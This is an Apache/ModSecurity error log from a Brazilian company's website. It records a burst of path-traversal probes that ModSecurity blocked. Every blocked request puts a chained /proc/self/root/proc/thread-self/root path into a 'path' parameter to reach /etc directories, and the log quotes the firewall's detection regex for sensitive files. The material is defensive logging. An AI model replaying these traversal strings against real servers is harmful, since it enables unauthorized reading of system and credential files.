[Tue Mar 17 22:36:29.187280 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:53002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBnda6ubjKNq_cu4Y3PgAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:35.139078 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:53012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBo9a6ubjKNq_cu4Y3QgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:38.655974 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:33836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBpuoXxyEfFpUF8f8N_AAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:39.922318 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:57656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBp8df6f5d65gmYZRwuQAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:36:40.928092 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:33850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBqMdf6f5d65gmYZRwuwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:42.616202 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:33854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBquoXxyEfFpUF8f8N_gAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:44.095248 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:33862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBrOyqAr6etmhZHNpXiwAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:46.153785 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:36:47.451579 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:33876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBr9a6ubjKNq_cu4Y3SAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:49.174313 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:40822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBsRj0p0SRWAqcjGGq_gAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:50.656149 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:40824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBstY0UrI5A3LftIwvngAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:07.131109 2026] [proxy_fcgi:error] [pid 18211:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53462] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:37:08.177052 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:40840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBxOw_le52K8_3pV19qwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:09.823626 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:58004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBxYh-PF_25v4hFRCccAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:11.527478 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:58016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBx4h-PF_25v4hFRCccQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:12.903407 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:58028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboByMdf6f5d65gmYZRw0AAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:15.177545 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:58034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBywkwaGbbGflqUZC0ogAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:17.813908 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:58042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBzOyqAr6etmhZHNpXkAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:19.129407 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:54850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBz-oXxyEfFpUF8f8ODAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:29.130146 2026] [proxy_fcgi:error] [pid 25836:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53778] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:37:30.440516 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:50574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB2uoXxyEfFpUF8f8ODQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:31.935363 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.241.31:50580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB2-w_le52K8_3pV19rQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:33.682766 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:50584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB3eoXxyEfFpUF8f8ODgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:35.095231 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:50588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB39a6ubjKNq_cu4Y3TAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:37.271912 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:50590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB4OoXxyEfFpUF8f8ODwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
